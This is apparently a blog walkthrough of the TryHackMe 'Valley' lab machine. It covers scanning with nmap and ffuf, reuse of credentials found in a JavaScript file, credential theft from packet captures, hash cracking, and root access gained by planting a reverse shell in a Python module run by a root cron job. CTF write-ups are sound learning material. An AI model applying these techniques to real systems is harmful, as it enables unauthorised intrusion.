Open in app

Sign in

Write

Sign in

TryHackMe : Valley

#$ubh@nk@r
6 min readJun 18, 2023

--

This is a Easy Linux Machine with some easy Enumeration. So as usual I started with easy ‘Nmap’ Scan.

Tip : nmap -sVC -T4 <ip> -vv

Here I found 2 Port open 80(http) and 22(ssh). So I check the Web Server.

WEB Enumeration:

This is a Simple Page. There is a ‘View Gallery’ and ‘View Pricing’ link. I try to open those.

In the pricing directory I found a ‘note.txt’ which is not so interesting. The the other is the Simple Web Page.

So i started with a ‘Gobuster’ scan and I found some directory. But they are not so interesting.

So I again go to the webpage and check the ‘view gallery’ page.

Here I found lot of images and I think for Steganography but I found nothing. But when I click on a image it comes like this below.

The URL is ‘http://<ip>/static/2’ and the ‘2’ number is dynamically set. If I change number to ‘3’ then the next image will come. So I try to FUZZ that with ‘ffuf’ along with a number list

Tip : ffuf -u ‘http://<ip>/static/FUZZ’ -w ‘<number_list>’ -t 50

And I got some result.

Here the ‘00’ number looks interesting so I look for it. And as usual it is right.:)

I found a Hidden directory called ‘/dev1243224123123’ I checked that dir and found a Login Page . Ohhhhhhhh!!!!!!!!!!!!!

I tried regular cred but failure. I also tried for SQL Injection but nothing. So now I try to view Source Code of the page and I found a Interesting javascript file called ‘dev.js’.

So sometime source code reveals something. And I open that file.

Here under the if statement there are two variable whose value is set to siemDev : california (username : password). And try to logged in and I got this.

There are note for me from dev saying about FTP service. But i don’t found any open FTP por. Here is a note that ‘change ftp port to normal port’. that means FTP is not running in port 21. So I tried for full port scan again and I found that Port. :)

Tip : nmap -sVC -p- -T4 <ip> -vv

It is running on 37370 but not found any Anonymous Login. SoI tried to login with that credential found in Web Page.

FTP Enumeration:

FTP = siemDev : california

And I logged in.

Analysis with Wireshark:

Here I found 3 packet file. I downloaded all in my machine. And I fire up my Wireshark.

I tried for siemFTP and siemHTTP1 and there is nothing Interesting. Then I checked for ‘siemHTTP2’.

Here I filtered for ‘http’ request and this is like above. Here I found a GET and POST request on/index.html. So I first check for GET request and then for POST request. And I found this in POST request. Right click on that packet then click on Follow then click on TCP stream. You will find this.

valleyDev > valley:

Here I found username and password (valley : ph0t0s1234). I am thinking that it can be SSH credentials. I try to login and at last I logged in as user and found the ‘user.txt’.

I started regular enumeration. In the home directory I found a binary file and I downloaded that in my machine. I try to execute that but it is asking for username and password which is unknown.

So I use ‘string’ command on that binary and save it in a file.

I opened it with Mousepad and search for any string with ‘user’ because there are lot of random strings.

Here the long string is MD5 hash. I go ‘Crackstation’ and I cracked it and found a password. Yahh!!

It is liberty123.

But what is the Username? As I am ‘valleyDev’ user I check for other users in that machine and I found valley is Valid user. And I ‘su’ to that user using that password. And we are logged in as valley.

Privilage Escalation:

Here using ‘id’ command I found there is group called ‘valleyadmin’. I started finding files who owned that group.

I also find a python script is running as Root in ‘Cronjob’. That is Interesting.

I opened that script and it is importing a module called base64. And that module is specified in ‘/usr/lib/python3.8/base64.py’.

So I open ‘/usr/lib/python3.8/base64.py’ this script and place a python reverse shell command in that. So when cronjob will run photoEncrypt.py it import base64.py module and the reverse_shell will Execute and we will get a Shell as Root.

I saved the file and fire up my Netcat listener in my machine at port 4444.

And after sometime I got a shell as root. And in this way I pawned the machine. In the root directory you will found ‘root.txt’.

Thank You!

Happy Hacking~~

--

--

#$ubh@nk@r
#$ubh@nk@r

Written by #$ubh@nk@r

829 Followers
53 Following

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams